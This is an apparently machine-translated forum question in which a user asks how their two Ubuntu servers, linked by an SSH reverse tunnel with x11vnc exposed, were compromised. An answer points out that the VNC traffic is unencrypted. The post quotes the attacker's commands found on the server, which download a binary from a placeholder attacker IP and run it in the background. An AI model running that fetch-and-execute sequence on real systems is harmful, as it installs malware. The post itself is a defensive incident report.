ssh隧道和x11服务器的薄弱环节，黑客调查

Question

今天我被黑了。这是非常令我费解的是如何做到这一点，所以我正在寻找有经验的人，以显示我的系统设计的弱点。

我有两台服务器。第一个是连接到internet的VPS (server1)，第二个是服务器内部专用网络(server2)，通过ssh反向隧道连接到第一个专用网络，将端口22 (ssh)和5900 (x11vnc)暴露到因特网上。这两台服务器都是Ubuntu14.04。

我使用这些命令创建ssh反向隧道(在server2上)：

autossh -fR \*:4202:localhost:22 -N root@server1.com
autossh -fR \*:5900:localhost:5900 -N root@server1.com

有关我服务器上SSH配置的更多细节。

server1

1. 允许根登录
2. 有以下一行:指定了GatewayPorts客户端

全配置

server2

1. 不允许root登录。
2. 使用默认(股票) ssh配置
3. 我使用普通的(蝙蝠侠相关：)用户名和9个字符的密码。

全配置

至于x11，我使用这个命令来创建x11vnc服务器：

/usr/bin/x11vnc -dontdisconnect -notruecolor -noxfixes -shared -forever -rfbport 5900 -bg -o /home/{username}/.vnc/x11vnc.log -rfbauth /home/{username}/.vnc/passwd -auth /var/lib/mdm/:0.Xauth

我的VNC密码很好。

server1是积极的野蛮人，但我没有任何证据表明它是被破坏的。

没有密码就不能从server2访问server1。

黑了！

所以，今天我在server2上的server2上找到了这个：

wget http://{HACKER_IP}:8080/heng
chmod 0755 /root/heng
chmod 0755 ./heng
/dev/null 2>&1 &
nohup ./heng > /dev/null 2>&1 &

{HACKER_IP}由虚拟总额报告为分发Win32.Ramnit的。

/var/log/auth.log是干净的。

恒进程在我的记忆中，但不在磁盘上。我已经关闭了我的系统所以我再也没有它了。

我的配置和使用中可能存在的弱点：

1. 密码曾一度通过skype传送。
2. 我使用xshell，使用密码管理器存储连接的密码。
3. 我经常用公共无线电信号。

，我哪里出错了?

server2怎么可能在server1之前就被破坏了？它生活在非标准4202端口，并使用相当好的登录/密码组合。

我将来怎样才能避免这种情况？

Answer 1

据我从您的设置中可以看出，VNC流量没有加密。很容易将会话记录回server2。请参见：

http://vncspy.sourceforge.net/